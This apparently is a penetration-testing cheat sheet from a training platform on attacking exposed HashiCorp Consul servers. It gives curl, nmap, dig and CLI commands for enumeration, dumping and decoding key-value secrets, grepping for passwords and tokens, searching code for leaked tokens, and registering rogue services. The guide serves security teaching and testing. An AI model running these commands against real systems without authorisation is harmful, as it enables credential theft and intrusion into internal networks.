Want to Practice These Techniques?

Try Hackviser's interactive cyber security upskilling platform - Learn by doing!

Consul

Default Ports: 8500 (HTTP API/UI), 8600 (DNS), 8300-8302 (Cluster)

HashiCorp Consul provides service discovery, health checks, DNS, and a key-value store. In pentests, exposed Consul can leak services, internal hosts, KV secrets, ACL tokens, and network topology.

Connect

HTTP API

The HTTP API exposes nodes, services, health checks, KV data, and ACL behavior.

curl http://target.com:8500/v1/status/leader
curl http://target.com:8500/v1/catalog/nodes
curl http://target.com:8500/v1/catalog/services

Consul CLI

The CLI uses the same API and is useful with valid tokens.

export CONSUL_HTTP_ADDR=http://target.com:8500
consul members
consul catalog services
consul kv get -recurse

DNS Interface

Consul DNS reveals service names and instances.

dig @target.com -p 8600 consul.service.consul
dig @target.com -p 8600 web.service.consul
dig @target.com -p 8600 ANY service.consul

Token Header

Use X-Consul-Token to validate leaked or provided tokens.

curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/acl/token/self
curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/kv/?recurse

Recon

Service Detection with Nmap

Scan API, DNS, and cluster ports.

nmap -p 8300,8301,8302,8500,8501,8600 -sV target.com
nmap -sU -p 8600 target.com
nmap -p 8500 --script http-title,http-headers target.com

UI Discovery

The UI reveals whether Consul is exposed and whether ACLs are enabled.

curl -I http://target.com:8500/ui/
httpx -u http://target.com:8500 -title -tech-detect -status-code

ACL Check

Anonymous access should be limited when ACLs are enabled.

curl -i http://target.com:8500/v1/acl/bootstrap
curl -i http://target.com:8500/v1/acl/token/self
curl -i http://target.com:8500/v1/catalog/services

Enumeration

Node Enumeration

Nodes reveal internal hostnames, addresses, and datacenters.

curl http://target.com:8500/v1/catalog/nodes | jq
consul catalog nodes

Service Enumeration

Services reveal internal applications and ports.

curl http://target.com:8500/v1/catalog/services | jq
curl http://target.com:8500/v1/catalog/service/web | jq
consul catalog services

Health Enumeration

Health checks expose endpoints, scripts, and failing services.

curl http://target.com:8500/v1/health/state/any | jq
curl http://target.com:8500/v1/health/checks/web | jq

KV Enumeration

KV paths may contain app configs, tokens, and service secrets.

curl http://target.com:8500/v1/kv/?keys
curl http://target.com:8500/v1/kv/?recurse | jq
consul kv get -recurse

DNS Enumeration

Consul DNS maps services without API access.

dig @target.com -p 8600 web.service.consul
dig @target.com -p 8600 _web._tcp.service.consul SRV

Attack Vectors

Anonymous API Access

Anonymous catalog or KV access leaks internal service discovery data.

curl http://target.com:8500/v1/catalog/services | jq
curl http://target.com:8500/v1/kv/?recurse | jq

Leaked ACL Tokens

Consul tokens are often stored in configs, env files, and CI variables.

rg -n 'CONSUL_HTTP_TOKEN|X-Consul-Token|consul token|acl token' .
curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/acl/token/self

KV Secret Exposure

KV data may include credentials and deployment configs.

curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/kv/?recurse | jq -r '.[].Value' | base64 -d

Service Registration Abuse

Write access may allow rogue service registration.

curl -H "X-Consul-Token: TOKEN" \
  -X PUT \
  -d '{"Name":"pentest-test","Address":"127.0.0.1","Port":8080}' \
  http://target.com:8500/v1/agent/service/register

Health Check Abuse

Dangerous script checks can execute commands on agents.

curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/agent/checks | jq

Post-Exploitation

Service Map

Use catalog and health data to map internal systems.

curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/catalog/nodes > consul-nodes.json
curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/catalog/services > consul-services.json

Secret Review

Decode KV values and search for credentials.

curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/kv/?recurse > consul-kv.json
jq -r '.[].Value' consul-kv.json | base64 -d | grep -Ei 'password|secret|token|apikey|jdbc|aws'

ACL Review

Document token identity and policy scope.

curl -H "X-Consul-Token: TOKEN" http://target.com:8500/v1/acl/token/self | jq

Useful Tools

Tool	Purpose
`curl`	HTTP API testing
`consul`	Native CLI
`dig`	Consul DNS testing
`jq`	JSON parsing
`nmap`	Port scanning
`httpx`	UI fingerprinting
`rg`	Token searching

Security Misconfigurations

Misconfiguration	Risk
Anonymous API access	Service and node disclosure
Anonymous KV access	Secret leakage
Leaked ACL tokens	API abuse
Broad write tokens	Service registration abuse
Consul DNS exposed broadly	Internal service discovery
Script checks enabled unsafely	Command execution risk
UI exposed without controls	Recon and token attack surface

Want to Practice These Techniques?

Consul

Connect​

HTTP API​

Consul CLI​

DNS Interface​

Token Header​

Recon​

Service Detection with Nmap​

UI Discovery​

ACL Check​

Enumeration​

Node Enumeration​

Service Enumeration​

Health Enumeration​

KV Enumeration​

DNS Enumeration​

Attack Vectors​

Anonymous API Access​

Leaked ACL Tokens​

KV Secret Exposure​

Service Registration Abuse​

Health Check Abuse​

Post-Exploitation​

Service Map​

Secret Review​

ACL Review​

Useful Tools​

Security Misconfigurations​